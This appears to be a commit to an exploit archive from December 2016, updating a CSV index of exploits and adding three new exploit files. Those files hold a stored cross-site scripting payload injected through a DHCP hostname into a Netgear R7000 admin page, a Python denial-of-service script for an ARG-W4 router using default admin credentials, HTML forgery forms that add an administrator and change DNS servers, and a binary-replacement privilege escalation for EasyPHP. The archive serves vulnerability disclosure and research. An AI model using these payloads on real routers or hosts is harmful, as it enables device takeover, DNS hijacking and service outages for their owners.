DB: 2016-12-12

3 new exploits

BolinTech DreamFTP Server 1.0 - User Name Format String (1)
BolinTech DreamFTP Server 1.0 - User Name Format String

opera Web browser 7.54 java implementation - Multiple Vulnerabilities (1)
Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (1)

Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat PoC
Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC)

EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation

Orca 2.0.2 - Cross-Site Scripting
Orca 2.0.2 - 'topic ' Cross-Site Scripting
Netgear R7000 - Cross-Site Scripting
ARG-W4 ADSL Router - Multiple Vulnerabilities

files.csv

@@ -3073,7 +3073,7 @@ id,file,description,date,author,platform,type,port
 23648,platforms/windows/dos/23648.pl,"Web Crossing Web Server 4.0/5.0 Component - Remote Denial of Service",2004-02-04,"Peter Winter-Smith",windows,dos,0
 23654,platforms/windows/dos/23654.txt,"Xlight FTP Server 1.x - Long Directory Request Remote Denial of Service",2004-02-05,intuit,windows,dos,0
 23656,platforms/multiple/dos/23656.txt,"Oracle 9.x - Database Parameter / Statement Buffer Overflow",2003-02-05,NGSSoftware,multiple,dos,0
-23660,platforms/windows/dos/23660.c,"BolinTech DreamFTP Server 1.0 - User Name Format String (1)",2004-02-07,shaun2k2,windows,dos,0
+23660,platforms/windows/dos/23660.c,"BolinTech DreamFTP Server 1.0 - User Name Format String",2004-02-07,shaun2k2,windows,dos,0
 23662,platforms/linux/dos/23662.c,"Nadeo Game Engine - Remote Denial of Service",2004-02-09,scrap,linux,dos,0
 23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 - results.stm Post Request Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0
 23665,platforms/windows/dos/23665.c,"Shaun2k2 Palmhttpd Server 3.0 - Remote Denial of Service",2004-02-09,shaun2k2,windows,dos,0
@@ -3256,7 +3256,7 @@ id,file,description,date,author,platform,type,port
 24741,platforms/windows/dos/24741.txt,"TagScanner 5.1 - Stack Buffer Overflow",2013-03-13,Vulnerability-Lab,windows,dos,0
 24743,platforms/windows/dos/24743.txt,"Cam2pc 4.6.2 - BMP Image Processing Integer Overflow",2013-03-13,coolkaveh,windows,dos,0
 24747,platforms/linux/dos/24747.c,"Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Based Buffer Overflow",2013-03-13,"Petr Matousek",linux,dos,0
-24755,platforms/linux/dos/24755.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (1)",2004-11-19,"Marc Schoenefeld",linux,dos,0
+24755,platforms/linux/dos/24755.java,"Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (1)",2004-11-19,"Marc Schoenefeld",linux,dos,0
 24756,platforms/linux/dos/24756.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (2)",2004-11-19,"Marc Schoenefeld",linux,dos,0
 24761,platforms/multiple/dos/24761.txt,"Gearbox Software Halo Game 1.x - Client Remote Denial of Service",2004-11-22,"Luigi Auriemma",multiple,dos,0
 24763,platforms/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plugin - JavaScript Security Restriction Bypass",2004-11-22,"Jouko Pynnonen",multiple,dos,0
@@ -3926,7 +3926,7 @@ id,file,description,date,author,platform,type,port
 31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec ActiveX - (Data parameter) Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
 31177,platforms/windows/dos/31177.html,"MW6 Technologies Datamatrix ActiveX - (Data Parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
 31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode ActiveX - (Data parameter) Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
-31305,platforms/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat PoC",2014-01-31,"Kees Cook",linux,dos,0
+31305,platforms/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC)",2014-01-31,"Kees Cook",linux,dos,0
 31271,platforms/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",multiple,dos,0
 31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service",2008-02-15,"Carl Hardwick",multiple,dos,0
 31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0
@@ -8691,6 +8691,7 @@ id,file,description,date,author,platform,type,port
 40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Local Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0
 40871,platforms/linux/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,linux,local,0
 40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0
+40902,platforms/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -20516,7 +20517,7 @@ id,file,description,date,author,platform,type,port
 7925,platforms/php/webapps/7925.txt,"revou twitter clone - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-30,nuclear,php,webapps,0
 7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 - (09.01.30) Multiple Local+Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0
 7930,platforms/php/webapps/7930.txt,"bpautosales 1.0.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-30,"Mehmet Ince",php,webapps,0
-7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 - Cross-Site Scripting",2009-01-30,J-Hacker,php,webapps,0
+7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 - 'topic ' Cross-Site Scripting",2009-01-30,J-Hacker,php,webapps,0
 7932,platforms/php/webapps/7932.txt,"SkaLinks 1.5 - (Authentication Bypass) SQL Injection",2009-01-30,Dimi4,php,webapps,0
 7933,platforms/php/webapps/7933.txt,"eVision CMS 2.0 - (field) SQL Injection",2009-01-30,darkjoker,php,webapps,0
 7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-02,ahmadbady,php,webapps,0
@@ -36862,3 +36863,5 @@ id,file,description,date,author,platform,type,port
 40877,platforms/php/webapps/40877.txt,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",php,webapps,0
 40887,platforms/hardware/webapps/40887.txt,"Cisco Unified Communications Manager 7/8/9 - Directory Traversal",2016-12-07,justpentest,hardware,webapps,0
 40889,platforms/cgi/webapps/40889.txt,"Netgear R7000 - Command Injection",2016-12-07,Acew0rm,cgi,webapps,0
+40898,platforms/hardware/webapps/40898.txt,"Netgear R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",hardware,webapps,0
+40901,platforms/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",hardware,webapps,0

platforms/hardware/webapps/40898.txt

@@ -0,0 +1,21 @@
+# Exploit Title: Netgear R7000 - XSS via. DHCP hostname
+# Date: 11-12-2016
+# Exploit Author: Vincent Yiu
+# Contact: https://twitter.com/vysecurity
+# Vendor Homepage: https://www.netgear.com/
+# Category: Hardware / WebApp
+# Version: V1.0.7.2_1.1.93 + LATEST to date
+ 
+-Vulnerability
+An user who has access to send DHCP via either VPN or Wireless connection can serve a host name with script tags to trigger XSS.
+
+Could be potentially used to connect to open or guest WIFI hotspot and inject stored XSS into admin panel and steal cookie for authentication.
+
+http://RouterIP/start.htm
+
+Then visit the "view who's connected" page.
+ 
+-Proof Of Concept
+Set /etc/dhcp/dhclient.conf
+
+send host-name "<script>alert('xss')</script>";

platforms/hardware/webapps/40901.txt

@@ -0,0 +1,66 @@
+# Exploit Title: ARG-W4 ADSL Router - Multiple Vulnerabilities
+# Date: 2016-12-11
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM 
+# Tested on: Windows AND Linux
+# Exploit Demo : http://persian-team.ir/showthread.php?tid=196
+
+1 - Denial of Service
+
+#!/usr/bin/python
+import urllib2
+import urllib
+
+site=raw_input("Enter Url : ")
+site=site+"/form2Upnp.cgi"
+username='admin'
+password='admin'
+p = urllib2.HTTPPasswordMgrWithDefaultRealm()
+p.add_password(None, site, username, password)
+handler = urllib2.HTTPBasicAuthHandler(p)
+opener = urllib2.build_opener(handler)
+urllib2.install_opener(opener)
+
+post = {'daemon':' ','ext_if':'pppoe+1','submit.htm?upnp.htm':'Send'}
+data = urllib.urlencode(post)
+try:
+    html = urllib2.urlopen(site,data)
+    print ("Done ! c_C")
+except:
+    print ("Done ! c_C")
+	
+2-1 Cross-Site Request Forgery (Add Admin)
+
+<html>
+  <body>
+    <form action="http://192.168.1.1/form2userconfig.cgi" method="POST">
+      USER:<input type="text" name="username" value="mobham" />
+      <input type="hidden" name="privilege" value="2" />
+      PWD:<input type="text" name="newpass" value="mobham" />
+      RPWD:<input type="texr" name="confpass" value="mobham" />
+      <input type="hidden" name="adduser" value="Add" />
+      <input type="hidden" name="hiddenpass" value="" />
+      <input type="hidden" name="submit&#46;htm&#63;userconfig&#46;htm" value="Send" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+2-2 Cross-Site Request Forgery (Change DNS)
+
+<html>
+  <body>
+    <form action="http://192.168.1.1/form2Dns.cgi" method="POST">
+      <input type="hidden" name="dnsMode" value="1" />
+      DNS<input type="text" name="dns1" value="2&#46;2&#46;2&#46;2" />
+      DNS 2<input type="text" name="dns2" value="1&#46;1&#46;1&#46;1" />
+      DNS 3<input type="text" name="dns3" value="" />
+      <input type="hidden" name="submit&#46;htm&#63;dns&#46;htm" value="Send" />
+      <input type="hidden" name="save" value="Apply&#32;Changes" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+
+

platforms/windows/local/40902.txt

@@ -0,0 +1,28 @@
+Title: EasyPHP Devserver Insecure File Permissions Privilege Escalation
+Application: EasyPHP Devserver
+Versions Affected: 16.1
+Vendor URL: http://www.easyphp.org/
+Discovered by: Ashiyane Digital Security Team ~ Micle
+Tested on: Windows 10 Professional x86
+Bugs: Insecure File Permissions Privilege Escalation
+Source: http://www.micle.ir/exploits/1003
+Date: 10-Dec-2016
+
+Description:
+EasyPHP installs by default to "C:\Program Files\EasyPHP-Devserver-16.1" 
+with very weak file permissions granting any
+user full permission to the exe. This allows opportunity for code 
+execution against any other user running the application.
+
+Proof:
+C:\Program Files\EasyPHP-Devserver-16.1>cacls run-easyphp-devserver.exe
+C:\Program Files\EasyPHP-Devserver-16.1\run-easyphp-devserver.exe 
+BUILTIN\Users:(ID)C
+NT AUTHORITY\SYSTEM:(ID)F
+                                   BUILTIN\Administrators:(ID)F
+                                   APPLICATION PACKAGE AUTHORITY\ALL 
+APPLICATION PACKAGES:(ID)R
+
+Exploit:
+Simply replace run-easyphp-devserver.exe and wait for execution.
+